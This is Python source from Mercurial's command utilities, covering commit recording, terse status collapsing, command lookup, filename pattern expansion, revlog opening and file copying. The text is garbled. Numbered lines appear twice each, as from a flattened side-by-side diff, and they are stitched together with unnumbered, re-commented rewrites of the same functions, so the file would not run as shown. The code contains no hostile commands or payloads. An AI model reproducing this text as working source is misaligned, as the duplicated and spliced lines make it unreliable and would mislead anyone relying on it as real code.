342 extra={"suffix": ".diff"},
342 extra={"suffix": ".diff"},
343 repopath=repo.path)
343 repopath=repo.path)
344 fp.truncate(0)
344 fp.truncate(0)
345 fp.write(reviewedpatch)
345 fp.write(reviewedpatch)
346 fp.seek(0)
346 fp.seek(0)
347
347
348 [os.unlink(repo.wjoin(c)) for c in newlyaddedandmodifiedfiles]
348 [os.unlink(repo.wjoin(c)) for c in newlyaddedandmodifiedfiles]
349 # 3a. apply filtered patch to clean repo (clean)
349 # 3a. apply filtered patch to clean repo (clean)
350 if backups:
350 if backups:
351 # Equivalent to hg.revert
351 # Equivalent to hg.revert
352 m = scmutil.matchfiles(repo, backups.keys())
352 m = scmutil.matchfiles(repo, backups.keys())
353 mergemod.update(repo, repo.dirstate.p1(),
353 mergemod.update(repo, repo.dirstate.p1(),
354 False, True, matcher=m)
354 False, True, matcher=m)
355
355
356 # 3b. (apply)
356 # 3b. (apply)
357 if dopatch:
357 if dopatch:
358 try:
358 try:
359 ui.debug('applying patch\n')
359 ui.debug('applying patch\n')
360 ui.debug(fp.getvalue())
360 ui.debug(fp.getvalue())
361 patch.internalpatch(ui, repo, fp, 1, eolmode=None)
361 patch.internalpatch(ui, repo, fp, 1, eolmode=None)
362 except patch.PatchError as err:
362 except patch.PatchError as err:
363 raise error.Abort(str(err))
363 raise error.Abort(str(err))
364 del fp
364 del fp
365
365
366 # 4. We prepared working directory according to filtered
366 # 4. We prepared working directory according to filtered
367 # patch. Now is the time to delegate the job to
367 # patch. Now is the time to delegate the job to
368 # commit/qrefresh or the like!
368 # commit/qrefresh or the like!
369
369
370 # Make all of the pathnames absolute.
370 # Make all of the pathnames absolute.
371 newfiles = [repo.wjoin(nf) for nf in newfiles]
371 newfiles = [repo.wjoin(nf) for nf in newfiles]
372 return commitfunc(ui, repo, *newfiles, **opts)
372 return commitfunc(ui, repo, *newfiles, **opts)
373 finally:
373 finally:
374 # 5. finally restore backed-up files
374 # 5. finally restore backed-up files
375 try:
375 try:
376 dirstate = repo.dirstate
376 dirstate = repo.dirstate
377 for realname, tmpname in backups.iteritems():
377 for realname, tmpname in backups.iteritems():
378 ui.debug('restoring %r to %r\n' % (tmpname, realname))
378 ui.debug('restoring %r to %r\n' % (tmpname, realname))
379
379
380 if dirstate[realname] == 'n':
380 if dirstate[realname] == 'n':
381 # without normallookup, restoring timestamp
381 # without normallookup, restoring timestamp
382 # may cause partially committed files
382 # may cause partially committed files
383 # to be treated as unmodified
383 # to be treated as unmodified
384 dirstate.normallookup(realname)
384 dirstate.normallookup(realname)
385
385
386 # copystat=True here and above are a hack to trick any
386 # copystat=True here and above are a hack to trick any
387 # editors that have f open that we haven't modified them.
387 # editors that have f open that we haven't modified them.
388 #
388 #
389 # Also note that this racy as an editor could notice the
389 # Also note that this racy as an editor could notice the
390 # file's mtime before we've finished writing it.
390 # file's mtime before we've finished writing it.
391 util.copyfile(tmpname, repo.wjoin(realname), copystat=True)
391 util.copyfile(tmpname, repo.wjoin(realname), copystat=True)
392 os.unlink(tmpname)
392 os.unlink(tmpname)
393 if tobackup:
393 if tobackup:
394 os.rmdir(backupdir)
394 os.rmdir(backupdir)
395 except OSError:
395 except OSError:
396 pass
396 pass
397
397
398 def recordinwlock(ui, repo, message, match, opts):
398 def recordinwlock(ui, repo, message, match, opts):
399 with repo.wlock():
399 with repo.wlock():
400 return recordfunc(ui, repo, message, match, opts)
400 return recordfunc(ui, repo, message, match, opts)
401
401
402 return commit(ui, repo, recordinwlock, pats, opts)
402 return commit(ui, repo, recordinwlock, pats, opts)
403
403
def tersestatus(root, statlist, status, ignorefn, ignore):
    """
    Returns a list of statuses with directory collapsed if all the files in the
    directory has the same status.

    'statlist' is a list of file lists, one per status code, indexed as in
    'indexes' below; 'status' is the string of status letters requested by
    the user; 'ignorefn' is a matcher for ignored files; 'ignore' is True
    when ignored files should be considered.
    """

    def numfiles(dirname):
        """
        Calculates the number of tracked files in a given directory which also
        includes files which were removed or deleted. Considers ignored files
        if ignore argument is True or 'i' is present in status argument.
        """
        # memoized: a directory may be asked about many times
        if lencache.get(dirname):
            return lencache[dirname]
        if 'i' in status or ignore:
            # ignored entries count, so only prune empty subdirectories
            def match(localpath):
                absolutepath = os.path.join(root, localpath)
                if os.path.isdir(absolutepath) and isemptydir(absolutepath):
                    return True
                return False
        else:
            def match(localpath):
                # there can be directory whose all the files are ignored and
                # hence the drectory should also be ignored while counting
                # number of files or subdirs in it's parent directory. This
                # checks the same.
                # XXX: We need a better logic here.
                if os.path.isdir(os.path.join(root, localpath)):
                    return isignoreddir(localpath)
                else:
                    # XXX: there can be files which have the ignored pattern but
                    # are not ignored. That leads to bug in counting number of
                    # tracked files in the directory.
                    return ignorefn(localpath)
        lendir = 0
        abspath = os.path.join(root, dirname)
        # There might be cases when a directory does not exists as the whole
        # directory can be removed and/or deleted.
        try:
            for f in os.listdir(abspath):
                localpath = os.path.join(dirname, f)
                if not match(localpath):
                    lendir += 1
        except OSError:
            pass
        # entries that are gone from disk still count toward the total
        lendir += len(absentdir.get(dirname, []))
        lencache[dirname] = lendir
        return lendir

    def isemptydir(abspath):
        """
        Check whether a directory is empty or not, i.e. there is no files in the
        directory and all its subdirectories.
        """
        for f in os.listdir(abspath):
            fullpath = os.path.join(abspath, f)
            if os.path.isdir(fullpath):
                # recursion here
                ret = isemptydir(fullpath)
                if not ret:
                    return False
            else:
                # any plain file makes the tree non-empty
                return False
        return True

    def isignoreddir(localpath):
        """Return True if `localpath` directory is ignored or contains only
        ignored files and should hence be considered ignored.
        """
        dirpath = os.path.join(root, localpath)
        if ignorefn(dirpath):
            return True
        for f in os.listdir(dirpath):
            filepath = os.path.join(dirpath, f)
            if os.path.isdir(filepath):
                # recursion here
                ret = isignoreddir(os.path.join(localpath, f))
                if not ret:
                    return False
            else:
                if not ignorefn(os.path.join(localpath, f)):
                    return False
        return True

    def absentones(removedfiles, missingfiles):
        """
        Returns a dictionary of directories with files in it which are either
        removed or missing (deleted) in them.
        """
        absentdir = {}
        absentfiles = removedfiles + missingfiles
        while absentfiles:
            f = absentfiles.pop()
            par = os.path.dirname(f)
            if par == '':
                continue
            # we need to store files rather than number of files as some files
            # or subdirectories in a directory can be counted twice. This is
            # also we have used sets here.
            try:
                absentdir[par].add(f)
            except KeyError:
                absentdir[par] = set([f])
            # propagate the absence up the directory tree
            absentfiles.append(par)
        return absentdir

    # status letter -> index into statlist / finalrs
    indexes = {'m': 0, 'a': 1, 'r': 2, 'd': 3, 'u': 4, 'i': 5, 'c': 6}
    # get a dictonary of directories and files which are missing as os.listdir()
    # won't be able to list them.
    absentdir = absentones(statlist[2], statlist[3])
    finalrs = [[]] * len(indexes)
    didsomethingchanged = False
    # dictionary to store number of files and subdir in a directory so that we
    # don't compute that again.
    lencache = {}

    for st in pycompat.bytestr(status):

        try:
            ind = indexes[st]
        except KeyError:
            # TODO: Need a better error message here
            raise error.Abort("'%s' not recognized" % st)

        sfiles = statlist[ind]
        if not sfiles:
            continue
        # group the files of this status by their parent directory
        pardict = {}
        for a in sfiles:
            par = os.path.dirname(a)
            pardict.setdefault(par, []).append(a)

        rs = []
        newls = []
        # a directory is collapsible when every tracked entry in it has
        # this status
        for par, files in pardict.iteritems():
            lenpar = numfiles(par)
            if lenpar == len(files):
                newls.append(par)

        if not newls:
            continue

        # collapse upward: a fully-collapsed child may allow its parent
        # to collapse too
        while newls:
            newel = newls.pop()
            if newel == '':
                continue
            parn = os.path.dirname(newel)
            pardict[newel] = []
            # Adding pycompat.ossep as newel is a directory.
            pardict.setdefault(parn, []).append(newel + pycompat.ossep)
            lenpar = numfiles(parn)
            if lenpar == len(pardict[parn]):
                newls.append(parn)

        # dict.values() for Py3 compatibility
        for files in pardict.values():
            rs.extend(files)

        rs.sort()
        finalrs[ind] = rs
        didsomethingchanged = True

    # If nothing is changed, make sure the order of files is preserved.
    if not didsomethingchanged:
        return statlist

    for x in xrange(len(indexes)):
        if not finalrs[x]:
            finalrs[x] = statlist[x]

    return finalrs
575
575
def findpossible(cmd, table, strict=False):
    """
    Return cmd -> (aliases, command table entry)
    for each matching command.
    Return debug commands (or their aliases) only if no normal command matches.
    """
    normal = {}
    debug = {}

    if cmd in table:
        # short-circuit exact matches, "log" alias beats "^log|history"
        entries = [cmd]
    else:
        entries = table.keys()

    allcmds = []
    for entry in entries:
        aliases = parsealiases(entry)
        allcmds.extend(aliases)

        if cmd in aliases:
            matched = cmd
        elif strict:
            matched = None
        else:
            # prefix matching: first alias starting with cmd wins
            matched = next((a for a in aliases if a.startswith(cmd)), None)

        if matched is None:
            continue
        isdebug = aliases[0].startswith("debug") or matched.startswith("debug")
        bucket = debug if isdebug else normal
        bucket[matched] = (aliases, table[entry])

    # debug commands are only offered when nothing else matched
    if not normal and debug:
        normal = debug

    return normal, allcmds
613
613
def findcmd(cmd, table, strict=True):
    """Return (aliases, command table entry) for command string.

    Raises error.AmbiguousCommand when several commands match and
    error.UnknownCommand when none do.
    """
    matches, allcmds = findpossible(cmd, table, strict)

    # an exact match always beats other prefix matches
    if cmd in matches:
        return matches[cmd]

    if len(matches) > 1:
        raise error.AmbiguousCommand(cmd, sorted(matches))

    if matches:
        return list(matches.values())[0]

    raise error.UnknownCommand(cmd, allcmds)
629
629
def findrepo(p):
    """Walk up from 'p' and return the closest directory containing a
    '.hg' directory, or None if no repository root is found."""
    current = p
    while True:
        if os.path.isdir(os.path.join(current, ".hg")):
            return current
        parent = os.path.dirname(current)
        if parent == current:
            # os.path.dirname() is a fixed point at the filesystem root
            return None
        current = parent
637
637
def bailifchanged(repo, merge=True, hint=None):
    """ enforce the precondition that working directory must be clean.

    'merge' can be set to false if a pending uncommitted merge should be
    ignored (such as when 'update --check' runs).

    'hint' is the usual hint given to Abort exception.
    """

    if merge and repo.dirstate.p2() != nullid:
        raise error.Abort(_('outstanding uncommitted merge'), hint=hint)
    # any modified/added/removed/deleted file makes the tree dirty
    if any(repo.status()[:4]):
        raise error.Abort(_('uncommitted changes'), hint=hint)
    # recurse into subrepositories; each enforces its own cleanliness
    wctx = repo[None]
    for subpath in sorted(wctx.substate):
        wctx.sub(subpath).bailifchanged(hint=hint)
655
655
def logmessage(ui, opts):
    """ get the log message according to -m and -l option """
    message = opts.get('message')
    logfile = opts.get('logfile')

    if message and logfile:
        raise error.Abort(_('options --message and --logfile are mutually '
                            'exclusive'))
    if message or not logfile:
        return message

    # no -m given: read the message from the logfile (or stdin for '-')
    try:
        if isstdiofilename(logfile):
            return ui.fin.read()
        # normalize line endings while reading the file
        return '\n'.join(util.readfile(logfile).splitlines())
    except IOError as inst:
        raise error.Abort(_("can't read commit message '%s': %s") %
                          (logfile, inst.strerror))
674
674
def mergeeditform(ctxorbool, baseformname):
    """return appropriate editform name (referencing a committemplate)

    'ctxorbool' is either a ctx to be committed, or a bool indicating whether
    merging is committed.

    This returns baseformname with '.merge' appended if it is a merge,
    otherwise '.normal' is appended.
    """
    if isinstance(ctxorbool, bool):
        ismerge = ctxorbool
    else:
        # a changeset with two parents is a merge
        ismerge = len(ctxorbool.parents()) > 1
    suffix = ".merge" if ismerge else ".normal"
    return baseformname + suffix
691
691
def getcommiteditor(edit=False, finishdesc=None, extramsg=None,
                    editform='', **opts):
    """get appropriate commit message editor according to '--edit' option

    'finishdesc' is a function to be called with edited commit message
    (= 'description' of the new changeset) just after editing, but
    before checking empty-ness. It should return actual text to be
    stored into history. This allows to change description before
    storing.

    'extramsg' is a extra message to be shown in the editor instead of
    'Leave message empty to abort commit' line. 'HG: ' prefix and EOL
    is automatically added.

    'editform' is a dot-separated list of names, to distinguish
    the purpose of commit text editing.

    'getcommiteditor' returns 'commitforceeditor' regardless of
    'edit', if one of 'finishdesc' or 'extramsg' is specified, because
    they are specific for usage in MQ.
    """
    if edit or finishdesc or extramsg:
        # MQ-style customization always goes through the forcing editor
        def editor(repo, ctx, subs):
            return commitforceeditor(repo, ctx, subs, finishdesc=finishdesc,
                                     extramsg=extramsg, editform=editform)
        return editor
    if editform:
        return lambda repo, ctx, subs: commiteditor(repo, ctx, subs,
                                                    editform=editform)
    return commiteditor
722
722
def loglimit(opts):
    """get the log limit according to option -l/--limit"""
    raw = opts.get('limit')
    if not raw:
        # option absent or empty: no limit
        return None
    try:
        limit = int(raw)
    except ValueError:
        raise error.Abort(_('limit must be a positive integer'))
    if limit <= 0:
        raise error.Abort(_('limit must be positive'))
    return limit
736
736
def makefilename(repo, pat, node, desc=None,
                 total=None, seqno=None, revwidth=None, pathname=None):
    """Expand the %-escapes in the output-filename pattern 'pat'.

    Always available: '%%' (literal '%') and '%b' (basename of repo.root).
    When 'node' is given: '%H'/'%h' full/short hex node, '%R' changelog
    revision, '%r' revision zero-padded to 'revwidth', '%m' description
    with non-word characters replaced by '_'.  '%N'/'%n' (total / padded
    sequence number) require 'total'/'seqno'; '%s'/'%d'/'%p' (basename /
    dirname / full path) require 'pathname'.

    Raises error.Abort on an escape with no registered expander.
    """
    node_expander = {
        'H': lambda: hex(node),
        'R': lambda: str(repo.changelog.rev(node)),
        'h': lambda: short(node),
        # raw string: '\w' is not a valid Python string escape
        'm': lambda: re.sub(r'[^\w]', '_', str(desc))
    }
    expander = {
        '%': lambda: '%',
        'b': lambda: os.path.basename(repo.root),
    }

    try:
        # merged the two duplicate "if node:" checks into one
        if node:
            expander.update(node_expander)
            expander['r'] = (lambda:
                    str(repo.changelog.rev(node)).zfill(revwidth or 0))
        if total is not None:
            expander['N'] = lambda: str(total)
        if seqno is not None:
            expander['n'] = lambda: str(seqno)
        if total is not None and seqno is not None:
            # pad the sequence number to the width of the total
            expander['n'] = lambda: str(seqno).zfill(len(str(total)))
        if pathname is not None:
            expander['s'] = lambda: os.path.basename(pathname)
            expander['d'] = lambda: os.path.dirname(pathname) or '.'
            expander['p'] = lambda: pathname

        newname = []
        patlen = len(pat)
        i = 0
        while i < patlen:
            c = pat[i:i + 1]
            if c == '%':
                # consume the escape character and expand it
                i += 1
                c = pat[i:i + 1]
                c = expander[c]()
            newname.append(c)
            i += 1
        return ''.join(newname)
    except KeyError as inst:
        raise error.Abort(_("invalid format spec '%%%s' in output filename") %
                          inst.args[0])
782
782
def isstdiofilename(pat):
    """True if the given pat looks like a filename denoting stdin/stdout"""
    # an empty/None pattern means the standard streams, as does '-'
    if not pat:
        return True
    return pat == '-'
786
786
787 class _unclosablefile(object):
787 class _unclosablefile(object):
788 def __init__(self, fp):
788 def __init__(self, fp):
789 self._fp = fp
789 self._fp = fp
790
790
791 def close(self):
791 def close(self):
792 pass
792 pass
793
793
794 def __iter__(self):
794 def __iter__(self):
795 return iter(self._fp)
795 return iter(self._fp)
796
796
797 def __getattr__(self, attr):
797 def __getattr__(self, attr):
798 return getattr(self._fp, attr)
798 return getattr(self._fp, attr)
799
799
800 def __enter__(self):
800 def __enter__(self):
801 return self
801 return self
802
802
803 def __exit__(self, exc_type, exc_value, exc_tb):
803 def __exit__(self, exc_type, exc_value, exc_tb):
804 pass
804 pass
805
805
def makefileobj(repo, pat, node=None, desc=None, total=None,
                seqno=None, revwidth=None, mode='wb', modemap=None,
                pathname=None):
    """Open the file described by the output-filename pattern 'pat'.

    A stdio pattern ('-' or empty) maps to the ui's stdout (when writing)
    or stdin, wrapped so that closing the result does not close the real
    stream.  'modemap' lets repeated opens of the same expanded filename
    switch from truncate ('wb') to append ('ab') after the first one.
    """
    writable = mode not in ('r', 'rb')

    if isstdiofilename(pat):
        stream = repo.ui.fout if writable else repo.ui.fin
        return _unclosablefile(stream)

    fn = makefilename(repo, pat, node, desc, total, seqno, revwidth, pathname)
    if modemap is not None:
        mode = modemap.get(fn, mode)
        if mode == 'wb':
            # the first write truncates; subsequent ones append
            modemap[fn] = 'ab'
    return open(fn, mode)
824
824
def openrevlog(repo, cmd, file_, opts):
    """opens the changelog, manifest, a filelog or a given revlog

    Exactly one of --changelog, --manifest, --dir or a filename selects
    the revlog; conflicting combinations abort.  Raises error.Abort or
    error.CommandError on invalid option combinations.
    """
    cl = opts['changelog']
    mf = opts['manifest']
    dir = opts['dir']
    msg = None
    # validate the option combination before touching the repository
    if cl and mf:
        msg = _('cannot specify --changelog and --manifest at the same time')
    elif cl and dir:
        msg = _('cannot specify --changelog and --dir at the same time')
    elif cl or mf or dir:
        if file_:
            msg = _('cannot specify filename with --changelog or --manifest')
        elif not repo:
            msg = _('cannot specify --changelog or --manifest or --dir '
                    'without a repository')
    if msg:
        raise error.Abort(msg)

    r = None
    if repo:
        if cl:
            # unfiltered so hidden changesets remain reachable for debugging
            r = repo.unfiltered().changelog
        elif dir:
            if 'treemanifest' not in repo.requirements:
                raise error.Abort(_("--dir can only be used on repos with "
                                    "treemanifest enabled"))
            dirlog = repo.manifestlog._revlog.dirlog(dir)
            if len(dirlog):
                r = dirlog
        elif mf:
            r = repo.manifestlog._revlog
        elif file_:
            filelog = repo.file(file_)
            if len(filelog):
                r = filelog
    if not r:
        if not file_:
            raise error.CommandError(cmd, _('invalid arguments'))
        if not os.path.isfile(file_):
            raise error.Abort(_("revlog '%s' not found") % file_)
        # fall back to opening a raw revlog index ('.d' -> '.i') relative
        # to the current working directory, bypassing path auditing
        r = revlog.revlog(vfsmod.vfs(pycompat.getcwd(), audit=False),
                          file_[:-2] + ".i")
    return r
869
869
870 def copy(ui, repo, pats, opts, rename=False):
870 def copy(ui, repo, pats, opts, rename=False):
871 # called with the repo lock held
871 # called with the repo lock held
872 #
872 #
873 # hgsep => pathname that uses "/" to separate directories
873 # hgsep => pathname that uses "/" to separate directories
874 # ossep => pathname that uses os.sep to separate directories
874 # ossep => pathname that uses os.sep to separate directories
875 cwd = repo.getcwd()
875 cwd = repo.getcwd()
876 targets = {}
876 targets = {}
877 after = opts.get("after")
877 after = opts.get("after")
878 dryrun = opts.get("dry_run")
878 dryrun = opts.get("dry_run")
879 wctx = repo[None]
879 wctx = repo[None]
880
880
881 def walkpat(pat):
881 def walkpat(pat):
882 srcs = []
882 srcs = []
883 if after:
883 if after:
884 badstates = '?'
884 badstates = '?'
885 else:
885 else:
886 badstates = '?r'
886 badstates = '?r'
887 m = scmutil.match(wctx, [pat], opts, globbed=True)
887 m = scmutil.match(wctx, [pat], opts, globbed=True)
888 for abs in wctx.walk(m):
888 for abs in wctx.walk(m):
889 state = repo.dirstate[abs]
889 state = repo.dirstate[abs]
890 rel = m.rel(abs)
890 rel = m.rel(abs)
891 exact = m.exact(abs)
891 exact = m.exact(abs)
892 if state in badstates:
892 if state in badstates:
893 if exact and state == '?':
893 if exact and state == '?':
894 ui.warn(_('%s: not copying - file is not managed\n') % rel)
894 ui.warn(_('%s: not copying - file is not managed\n') % rel)
895 if exact and state == 'r':
895 if exact and state == 'r':
896 ui.warn(_('%s: not copying - file has been marked for'
896 ui.warn(_('%s: not copying - file has been marked for'
897 ' remove\n') % rel)
897 ' remove\n') % rel)
898 continue
898 continue
899 # abs: hgsep
899 # abs: hgsep
900 # rel: ossep
900 # rel: ossep
901 srcs.append((abs, rel, exact))
901 srcs.append((abs, rel, exact))
902 return srcs
902 return srcs
903
903
904 # abssrc: hgsep
904 # abssrc: hgsep
905 # relsrc: ossep
905 # relsrc: ossep
906 # otarget: ossep
906 # otarget: ossep
907 def copyfile(abssrc, relsrc, otarget, exact):
907 def copyfile(abssrc, relsrc, otarget, exact):
908 abstarget = pathutil.canonpath(repo.root, cwd, otarget)
908 abstarget = pathutil.canonpath(repo.root, cwd, otarget)
909 if '/' in abstarget:
909 if '/' in abstarget:
910 # We cannot normalize abstarget itself, this would prevent
910 # We cannot normalize abstarget itself, this would prevent
911 # case only renames, like a => A.
911 # case only renames, like a => A.
912 abspath, absname = abstarget.rsplit('/', 1)
912 abspath, absname = abstarget.rsplit('/', 1)
913 abstarget = repo.dirstate.normalize(abspath) + '/' + absname
913 abstarget = repo.dirstate.normalize(abspath) + '/' + absname
914 reltarget = repo.pathto(abstarget, cwd)
914 reltarget = repo.pathto(abstarget, cwd)
915 target = repo.wjoin(abstarget)
915 target = repo.wjoin(abstarget)
916 src = repo.wjoin(abssrc)
916 src = repo.wjoin(abssrc)
917 state = repo.dirstate[abstarget]
917 state = repo.dirstate[abstarget]
918
918
919 scmutil.checkportable(ui, abstarget)
919 scmutil.checkportable(ui, abstarget)
920
920
921 # check for collisions
921 # check for collisions
922 prevsrc = targets.get(abstarget)
922 prevsrc = targets.get(abstarget)
923 if prevsrc is not None:
923 if prevsrc is not None:
924 ui.warn(_('%s: not overwriting - %s collides with %s\n') %
924 ui.warn(_('%s: not overwriting - %s collides with %s\n') %
925 (reltarget, repo.pathto(abssrc, cwd),
925 (reltarget, repo.pathto(abssrc, cwd),
926 repo.pathto(prevsrc, cwd)))
926 repo.pathto(prevsrc, cwd)))
927 return
927 return
928
928
929 # check for overwrites
929 # check for overwrites
930 exists = os.path.lexists(target)
930 exists = os.path.lexists(target)
931 samefile = False
931 samefile = False
932 if exists and abssrc != abstarget:
932 if exists and abssrc != abstarget:
933 if (repo.dirstate.normalize(abssrc) ==
933 if (repo.dirstate.normalize(abssrc) ==
934 repo.dirstate.normalize(abstarget)):
934 repo.dirstate.normalize(abstarget)):
935 if not rename:
935 if not rename:
936 ui.warn(_("%s: can't copy - same file\n") % reltarget)
936 ui.warn(_("%s: can't copy - same file\n") % reltarget)
937 return
937 return
938 exists = False
938 exists = False
939 samefile = True
939 samefile = True
940
940
941 if not after and exists or after and state in 'mn':
941 if not after and exists or after and state in 'mn':
942 if not opts['force']:
942 if not opts['force']:
943 if state in 'mn':
943 if state in 'mn':
944 msg = _('%s: not overwriting - file already committed\n')
944 msg = _('%s: not overwriting - file already committed\n')
945 if after:
945 if after:
946 flags = '--after --force'
946 flags = '--after --force'
947 else:
947 else:
948 flags = '--force'
948 flags = '--force'
949 if rename:
949 if rename:
950 hint = _('(hg rename %s to replace the file by '
950 hint = _('(hg rename %s to replace the file by '
951 'recording a rename)\n') % flags
951 'recording a rename)\n') % flags
952 else:
952 else:
953 hint = _('(hg copy %s to replace the file by '
953 hint = _('(hg copy %s to replace the file by '
954 'recording a copy)\n') % flags
954 'recording a copy)\n') % flags
955 else:
955 else:
956 msg = _('%s: not overwriting - file exists\n')
956 msg = _('%s: not overwriting - file exists\n')
957 if rename:
957 if rename:
958 hint = _('(hg rename --after to record the rename)\n')
958 hint = _('(hg rename --after to record the rename)\n')
959 else:
959 else:
960 hint = _('(hg copy --after to record the copy)\n')
960 hint = _('(hg copy --after to record the copy)\n')
961 ui.warn(msg % reltarget)
961 ui.warn(msg % reltarget)
962 ui.warn(hint)
962 ui.warn(hint)
963 return
963 return
964
964
965 if after:
965 if after:
966 if not exists:
966 if not exists:
967 if rename:
967 if rename:
968 ui.warn(_('%s: not recording move - %s does not exist\n') %
968 ui.warn(_('%s: not recording move - %s does not exist\n') %
969 (relsrc, reltarget))
969 (relsrc, reltarget))
970 else:
970 else:
971 ui.warn(_('%s: not recording copy - %s does not exist\n') %
971 ui.warn(_('%s: not recording copy - %s does not exist\n') %
972 (relsrc, reltarget))
972 (relsrc, reltarget))
973 return
973 return
974 elif not dryrun:
974 elif not dryrun:
975 try:
975 try:
976 if exists:
976 if exists:
977 os.unlink(target)
977 os.unlink(target)
978 targetdir = os.path.dirname(target) or '.'
978 targetdir = os.path.dirname(target) or '.'
979 if not os.path.isdir(targetdir):
979 if not os.path.isdir(targetdir):
980 os.makedirs(targetdir)
980 os.makedirs(targetdir)
981 if samefile:
981 if samefile:
982 tmp = target + "~hgrename"
982 tmp = target + "~hgrename"
983 os.rename(src, tmp)
983 os.rename(src, tmp)
984 os.rename(tmp, target)
984 os.rename(tmp, target)
985 else:
985 else:
986 util.copyfile(src, target)
986 util.copyfile(src, target)
987 srcexists = True
987 srcexists = True
988 except IOError as inst:
988 except IOError as inst:
989 if inst.errno == errno.ENOENT:
989 if inst.errno == errno.ENOENT:
990 ui.warn(_('%s: deleted in working directory\n') % relsrc)
990 ui.warn(_('%s: deleted in working directory\n') % relsrc)
991 srcexists = False
991 srcexists = False
992 else:
992 else:
993 ui.warn(_('%s: cannot copy - %s\n') %
993 ui.warn(_('%s: cannot copy - %s\n') %
994 (relsrc, inst.strerror))
994 (relsrc, inst.strerror))
995 return True # report a failure
995 return True # report a failure
996
996
997 if ui.verbose or not exact:
997 if ui.verbose or not exact:
998 if rename:
998 if rename:
999 ui.status(_('moving %s to %s\n') % (relsrc, reltarget))
999 ui.status(_('moving %s to %s\n') % (relsrc, reltarget))
1000 else:
1000 else:
1001 ui.status(_('copying %s to %s\n') % (relsrc, reltarget))
1001 ui.status(_('copying %s to %s\n') % (relsrc, reltarget))
1002
1002
1003 targets[abstarget] = abssrc
1003 targets[abstarget] = abssrc
1004
1004
1005 # fix up dirstate
1005 # fix up dirstate
1006 scmutil.dirstatecopy(ui, repo, wctx, abssrc, abstarget,
1006 scmutil.dirstatecopy(ui, repo, wctx, abssrc, abstarget,
1007 dryrun=dryrun, cwd=cwd)
1007 dryrun=dryrun, cwd=cwd)
1008 if rename and not dryrun:
1008 if rename and not dryrun:
1009 if not after and srcexists and not samefile:
1009 if not after and srcexists and not samefile:
1010 repo.wvfs.unlinkpath(abssrc)
1010 repo.wvfs.unlinkpath(abssrc)
1011 wctx.forget([abssrc])
1011 wctx.forget([abssrc])
1012
1012
1013 # pat: ossep
1013 # pat: ossep
1014 # dest ossep
1014 # dest ossep
1015 # srcs: list of (hgsep, hgsep, ossep, bool)
1015 # srcs: list of (hgsep, hgsep, ossep, bool)
1016 # return: function that takes hgsep and returns ossep
1016 # return: function that takes hgsep and returns ossep
1017 def targetpathfn(pat, dest, srcs):
1017 def targetpathfn(pat, dest, srcs):
1018 if os.path.isdir(pat):
1018 if os.path.isdir(pat):
1019 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1019 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1020 abspfx = util.localpath(abspfx)
1020 abspfx = util.localpath(abspfx)
1021 if destdirexists:
1021 if destdirexists:
1022 striplen = len(os.path.split(abspfx)[0])
1022 striplen = len(os.path.split(abspfx)[0])
1023 else:
1023 else:
1024 striplen = len(abspfx)
1024 striplen = len(abspfx)
1025 if striplen:
1025 if striplen:
1026 striplen += len(pycompat.ossep)
1026 striplen += len(pycompat.ossep)
1027 res = lambda p: os.path.join(dest, util.localpath(p)[striplen:])
1027 res = lambda p: os.path.join(dest, util.localpath(p)[striplen:])
1028 elif destdirexists:
1028 elif destdirexists:
1029 res = lambda p: os.path.join(dest,
1029 res = lambda p: os.path.join(dest,
1030 os.path.basename(util.localpath(p)))
1030 os.path.basename(util.localpath(p)))
1031 else:
1031 else:
1032 res = lambda p: dest
1032 res = lambda p: dest
1033 return res
1033 return res
1034
1034
1035 # pat: ossep
1035 # pat: ossep
1036 # dest ossep
1036 # dest ossep
1037 # srcs: list of (hgsep, hgsep, ossep, bool)
1037 # srcs: list of (hgsep, hgsep, ossep, bool)
1038 # return: function that takes hgsep and returns ossep
1038 # return: function that takes hgsep and returns ossep
1039 def targetpathafterfn(pat, dest, srcs):
1039 def targetpathafterfn(pat, dest, srcs):
1040 if matchmod.patkind(pat):
1040 if matchmod.patkind(pat):
1041 # a mercurial pattern
1041 # a mercurial pattern
1042 res = lambda p: os.path.join(dest,
1042 res = lambda p: os.path.join(dest,
1043 os.path.basename(util.localpath(p)))
1043 os.path.basename(util.localpath(p)))
1044 else:
1044 else:
1045 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1045 abspfx = pathutil.canonpath(repo.root, cwd, pat)
1046 if len(abspfx) < len(srcs[0][0]):
1046 if len(abspfx) < len(srcs[0][0]):
1047 # A directory. Either the target path contains the last
1047 # A directory. Either the target path contains the last
1048 # component of the source path or it does not.
1048 # component of the source path or it does not.
1049 def evalpath(striplen):
1049 def evalpath(striplen):
1050 score = 0
1050 score = 0
1051 for s in srcs:
1051 for s in srcs:
1052 t = os.path.join(dest, util.localpath(s[0])[striplen:])
1052 t = os.path.join(dest, util.localpath(s[0])[striplen:])
1053 if os.path.lexists(t):
1053 if os.path.lexists(t):
1054 score += 1
1054 score += 1
1055 return score
1055 return score
1056
1056
1057 abspfx = util.localpath(abspfx)
1057 abspfx = util.localpath(abspfx)
1058 striplen = len(abspfx)
1058 striplen = len(abspfx)
1059 if striplen:
1059 if striplen:
1060 striplen += len(pycompat.ossep)
1060 striplen += len(pycompat.ossep)
1061 if os.path.isdir(os.path.join(dest, os.path.split(abspfx)[1])):
1061 if os.path.isdir(os.path.join(dest, os.path.split(abspfx)[1])):
1062 score = evalpath(striplen)
1062 score = evalpath(striplen)
1063 striplen1 = len(os.path.split(abspfx)[0])
1063 striplen1 = len(os.path.split(abspfx)[0])
1064 if striplen1:
1064 if striplen1:
1065 striplen1 += len(pycompat.ossep)
1065 striplen1 += len(pycompat.ossep)
1066 if evalpath(striplen1) > score:
1066 if evalpath(striplen1) > score:
1067 striplen = striplen1
1067 striplen = striplen1
1068 res = lambda p: os.path.join(dest,
1068 res = lambda p: os.path.join(dest,
1069 util.localpath(p)[striplen:])
1069 util.localpath(p)[striplen:])
1070 else:
1070 else:
1071 # a file
1071 # a file
1072 if destdirexists:
1072 if destdirexists:
1073 res = lambda p: os.path.join(dest,
1073 res = lambda p: os.path.join(dest,
1074 os.path.basename(util.localpath(p)))
1074 os.path.basename(util.localpath(p)))
1075 else:
1075 else:
1076 res = lambda p: dest
1076 res = lambda p: dest
1077 return res
1077 return res
1078
1078
1079 pats = scmutil.expandpats(pats)
1079 pats = scmutil.expandpats(pats)
1080 if not pats:
1080 if not pats:
1081 raise error.Abort(_('no source or destination specified'))
1081 raise error.Abort(_('no source or destination specified'))
1082 if len(pats) == 1:
1082 if len(pats) == 1:
1083 raise error.Abort(_('no destination specified'))
